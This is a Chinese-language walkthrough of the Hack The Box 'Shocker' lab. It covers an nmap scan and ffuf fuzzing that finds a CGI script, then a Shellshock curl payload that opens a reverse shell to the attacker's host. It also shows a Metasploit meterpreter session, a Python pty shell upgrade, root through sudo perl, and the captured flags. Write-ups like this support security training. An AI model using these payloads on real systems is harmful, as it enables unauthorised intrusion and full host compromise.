Hackthebox - Shocker

靶场信息

靶场类型

信息收集

Nmap

┌──(root💀kali)-[~/Desktop/HTB/Easy/Shocker]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-01 22:29 EDT
Nmap scan report for 10.10.10.56
Host is up (0.25s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/1%OT=80%CT=1%CU=41565%PV=Y%DS=2%DC=T%G=Y%TM=6247B561
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=102%GCD=1%ISR=10B%TI=Z%II=I%TS=B)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%T
OS:S=8)OPS(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=
OS:M505ST11NW6%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7
OS:120)ECN(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 61716/tcp)
HOP RTT       ADDRESS
1   246.66 ms 10.10.14.1
2   246.79 ms 10.10.10.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.63 seconds

Http

这里也没看到什么东西,去 fuzz 一下

Fuzz

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.56/FUZZ" -w /usr/share/dirb/wordlists/common.txt                                   

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.56/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 137, Words: 9, Lines: 10]
.hta                    [Status: 403, Size: 290, Words: 22, Lines: 12]
.htaccess               [Status: 403, Size: 295, Words: 22, Lines: 12]
.htpasswd               [Status: 403, Size: 295, Words: 22, Lines: 12]
cgi-bin/                [Status: 403, Size: 294, Words: 22, Lines: 12]
index.html              [Status: 200, Size: 137, Words: 9, Lines: 10]
server-status           [Status: 403, Size: 299, Words: 22, Lines: 12]
:: Progress: [4614/4614] :: Job [1/1] :: 80 req/sec :: Duration: [0:01:00] :: Errors: 0 ::

看到有一个 cgi-bin 目录,继续 fuzz

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.56/cgi-bin/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -e .sh,.pl

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.56/cgi-bin/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Extensions       : .sh .pl 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

user.sh                 [Status: 200, Size: 118, Words: 19, Lines: 8]
                        [Status: 403, Size: 294, Words: 22, Lines: 12]
:: Progress: [60348/60348] :: Job [1/1] :: 152 req/sec :: Duration: [0:15:14] :: Errors: 19 ::

发现一个 user.sh 文件,去查看一下

有点不太明白这是啥,去 google 一下吧

https://antonyt.com/blog/2020-03-27/exploiting-cgi-scripts-with-shellshock

找到一篇文章

漏洞利用

Shellshock

根据文章内容,尝试一下反弹 shell

使用 nc 监听一个端口

nc -nvlp 4444

然后去利用

curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                                                                                                                                                                                               1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.56] 40320
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami&&id
whoami&&id
shelly
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$

成功得到一个 user 权限的 shell

exploit-db

https://www.exploit-db.com/exploits/34900

我这边利用有点问题,就不测试了

Metasploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options 

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting   Required  Description
   ----            ---------------   --------  -----------
   CMD_MAX_LENGTH  2048              yes       CMD max line length
   CVE             CVE-2014-6271     yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent        yes       HTTP header to use
   METHOD          GET               yes       HTTP method to use
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.10.10.56       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin              yes       Target PATH for binaries used by the CmdStager
   RPORT           80                yes       The target port (TCP)
   SRVHOST         0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080              yes       The local port to listen on.
   SSL             false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/user.sh  yes       Path to CGI script
   TIMEOUT         5                 yes       HTTP read response timeout (seconds)
   URIPATH                           no        The URI to use for this exploit (default is random)
   VHOST                             no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

设置好相关的配置后,执行

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 2 opened (10.10.14.4:4444 -> 10.10.10.56:40322) at 2022-04-02 00:56:02 -0400

meterpreter > getuid
Server username: shelly @ Shocker (uid=1000, gid=1000, euid=1000, egid=1000)

这里也成功回弹

修复 shell

python3 -c "import pty;pty.spawn('/bin/bash')";
Ctrl+Z返回
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237
shelly@Shocker:/home/shelly$ cat user.txt 
2ec24e11320026d1e70ff3e16695b233

成功拿到 user 权限的 flag 文件

权限提升

shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

使用 sudo -l 查看得知有权限使用 sudo 运行 /usr/bin/perl

https://gtfobins.github.io/gtfobins/perl/

perl 可以用上面的方法提权,尝试一下

sudo /usr/bin/perl -e 'exec "/bin/sh";'

shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

成功提权到 root 权限

# cat root.txt
52c2715605d70c7619030560dc1ca467

成功拿到 root 权限的 flag 文件